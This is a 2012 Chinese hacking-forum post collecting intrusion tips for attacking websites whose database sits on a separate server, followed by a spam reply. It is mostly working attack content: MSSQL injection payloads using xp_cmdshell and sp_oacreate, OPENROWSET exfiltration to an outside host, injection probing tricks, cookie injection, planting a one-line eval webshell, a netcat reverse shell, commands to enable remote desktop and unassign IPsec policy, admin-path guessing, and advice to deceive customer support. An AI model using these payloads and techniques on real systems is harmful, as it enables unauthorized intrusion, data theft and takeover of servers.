找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3385|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
SA点数据库分离技术相关6 X- `: W7 l. |9 l5 N

6 n  Z0 h. {: }
( r7 Z! Q) H: Y; USA点数据库分离搞法+语句:  u' D, d9 V4 C% p
* Z. o7 s: S7 B; p
注射点不显错,执行下面三条语句页面都返回正常。
5 N6 u7 g7 B$ P4 Y: F1 e) @2 k0 cand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')4 W0 E6 n( G. I4 N
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
( X, Z( F9 Z) A8 ?and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')  b, U4 m6 h2 J% ?- Q9 J- C& I
可以列目录,判断系统为2000,web与数据库分离+ l+ h5 i* D9 v) q) o* L6 {% a+ @; }
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
: F+ n- v8 T. n+ v! c  J在注射点上执行6 E4 G, a) B* ^; S
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
0 q; r& h- o3 f+ Q& M) w2 ]2 h& m页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP- E: l; S. n" i" f, T8 l* r
还有我用NC监听得其他端口都没有得到IP。/ D: z0 H% E1 k8 s4 t7 k% M. k0 |6 q/ n8 N

% B0 m! v; ?9 w; b通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。6 y, b0 ]) v) J% z
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
/ o% p. I8 s/ z7 |; Z0 a" D& ?" R9 P" i' ^) x1 q
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
) z+ X6 o2 u- f9 V( a* E: y9 ~7 L: Y/ `
现在就猜想是不是数据库是内网而且不能连外网。
! c! @4 \, x  k' K
8 v4 l1 t) A, |4 s) m2 |' M) Z$ a+ `, S1 e) h+ n3 h, a
access导出txt文本代码/ r0 f- e3 {  D5 q- Q" ^
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
! B$ T- m- @% G9 U* V
2 }) o, S& t+ f7 b1 w
2 [9 q/ P1 j, Z( Y3 m
1 b) q4 s% b; m自动跳转到指定网站代码头
  M2 o1 Y7 v* Q0 t& W3 x# w<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
. {# D8 g8 ~; I3 o$ o$ S; l+ u# Q: b4 h9 n9 U6 x9 `& Y

; W: ^- J% X& j6 ~4 p$ N1 V+ D& S入侵java or jsp站点时默认配置文件路径:
  ?) e! z" E1 h& C" l7 n. a\web-inf\web.xml3 c$ n" ?3 u3 Y! x2 y
tomcat下的配置文件位置:
6 Q6 ~8 x, H+ j% s; ~$ S\conf\server.xml            (前面加上tomcat路径)
* D3 r: O, [5 s* P* m5 |\Tomcat 5.0\webapps\root\web-inf\struts-config.xml  J$ D5 p' j% Z
# n" F$ @0 G+ P( U( Z
" t) t$ A2 K" N. |4 L) ~" a) Y% c

+ D$ s% K3 ^- R; d$ U+ @, @检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:6 V* k( C# `- r
-1%23
- Z& `$ o; ~2 z3 v" R> ( S  H: C  T& @  Q
<; [  A- U# Z  z  H
1'+or+'1'='13 y/ B4 h# Y/ r" V( Q9 Y% `2 s& \
id=8%bf
4 @% S' k; G2 b$ I& T* [9 _5 k
- i) E1 m) K1 Q" P) H, I全新注入点检测试法:
% K' j6 T! ~/ \在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。% A4 S4 ]4 \! i- w) _4 R3 l; F4 }

1 A- R$ w7 c7 `0 ]在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。8 [) Z& ~' j0 P" N# P% [

- |$ X% d+ a6 T搜索型注入判断方法:
) ?5 w9 p' t! s" t5 d6 a北京%' and '1'='1' and '%'=': }' l0 k; F! ?+ B6 x
北京%' and '1'='2' and '%'='
2 c$ W5 M. J! U! d  J7 p8 x4 s$ c6 F4 G5 K& q* B
/ I6 N0 U  n; Q! ~- O
COOKIES注入:# o6 g8 U( G+ y# u

7 U- H6 h. R; l' f/ q6 B% ljavascript:alert(document.cookie="id="+escape("51 and 1=1"));- N7 B. x% j# W2 e

) k" l) Y( D: I2 T/ e4 u2000专业版查看本地登录用户命令:
$ E" Z. B% Z7 V! j- G( f' Mnet config workstation6 M, R- t$ h4 Y
# ]# S* Q2 j$ a& t; [
: n7 r8 i# D& ^  ]% b$ W3 Z+ J
2003下查看ipsec配置和默认防火墙配置命令:
1 b( f* Q/ u; }4 ~9 ynetsh firewall show config
9 h; S1 |0 @4 f( q# R; nnetsh ipsec static show all
# l+ ^' t' b" V% u7 K8 K( P, W5 T, R( ?" g
不指派指定策略命令:* }& y5 S  |' z6 i! h% F/ }: A
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
% p% k* V  x5 K  Y& @+ N+ gnetsh ipsec static show policy all  显示策略名! E2 u, ~* P7 G, V" }1 G. U

6 T- f! i. R" ~
# I+ R& ~9 j1 |  F  [2 ^! m猜管理员后台小技巧:3 M/ |* m7 j4 r/ j8 m: H
admin/left.asp
3 D4 [( [+ {; q8 |! m3 z$ }! x, I. |admin/main.asp
) Q9 Y2 [$ ?1 Madmin/top.asp2 c6 Q9 C# G% p6 }$ {- U. a. @
admin/admin.asp
, S5 J3 P! s, A会现出菜单导航,然后迅雷下载全部链接
; U0 J9 j$ q3 c- b9 q( c. Y* @8 X: Y) |8 q
4 D8 d0 I- Y6 @1 G% q% ^) c
社会工程学:
2 N4 h3 O. w) x用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人% o" r) z# k' V$ Q9 k% L& V
然后去骗客服
8 R! I/ ?0 r7 `: [# E/ v  t0 d6 x0 r& C+ \. _# A: }

( r/ y/ y( N% S+ h* g- Q5 _统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
- V, P6 @" @9 e+ x) C) d查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, . `: y! v& b  s5 _5 a. B$ A
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
. v$ h2 [5 T8 {/ D8 H+ u  g& l6 b1 ~- C' c6 i

0 l# C# I7 a8 G0 }: D$ {; k! Z
- R  C/ x0 |' P6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
9 `5 T0 `; I( i6 U4 q
) `% w  {  P. Y# T# Q$ M) g/ q$ z5 p( n1 O" y1 t

5 A( ]- z# }, H( u+ r$ Z' G. S7 cCMD加密注册表位置& M7 u! u* t( k( V" e8 x/ }
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor. O! Z( i) B3 q9 s; p, L* ~
AutoRun+ \7 L) O1 F. p; a$ U0 T5 [- H

' C( `0 h& I5 n7 |: m+ e2 a# ^(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor  }( [# X( F. M3 U& V
AutoRun. Y+ n; T0 p! v6 Z$ u9 [! Z9 `9 H# X

4 ~* i. H" T5 ]$ R0 r" c9 V- k0 B( S, A" @% W. k* e  Z7 N
在找注入时搜索Hidden,把他改成test
: w! a) N7 m# q7 ]; L6 Q* z! ^5 j+ w* f9 |0 K. @

' j( \2 Y# q# D5 G7 }* S: ~: Z/ Q0 d) k
mstsc /v:IP /console
* ~( ?2 m' n0 o" r: X% V: O2 Q' }$ H$ C
0 ~9 Q3 O* a& i
一句话开3389:
( k! h! m3 M* S
- i8 `: ]! Z1 J8 T+ x最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  : B" j% G/ e( p2 t- c, B& C
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.& S/ ]7 [7 a& |! N3 j" z) ^
) v) |% R' m; P: a

! J4 e: b6 w/ ~9 t知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:2 u' Q3 ]+ ?# D7 O3 Q$ i
Insert into admin(user,pwd) values('test','test')
0 u; m$ p- S- S1 v; A9 f" [: I5 ]4 |- |% b
: Z) [/ l& i+ X& f( L, w0 V
NC反弹3 _% p" e. S8 F" B
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
, |2 }! `: h+ j+ c% ~; z5 l然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
0 w/ F% _( |% L5 |+ y
0 F& s% d7 @/ ]& M( P7 q# m9 P5 [( i& L1 \: D
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
7 p. F0 _! n( ~: k% X  b: R% Z. A2 C
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录" n3 v2 u! \. ?9 j1 [4 S  X% [
例如:+ D0 Q0 h4 n" F/ S; z( \: T1 O
subst k: d:\www\ 用d盘www目录替代k盘
8 |% \# C/ I% Z+ m4 \subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表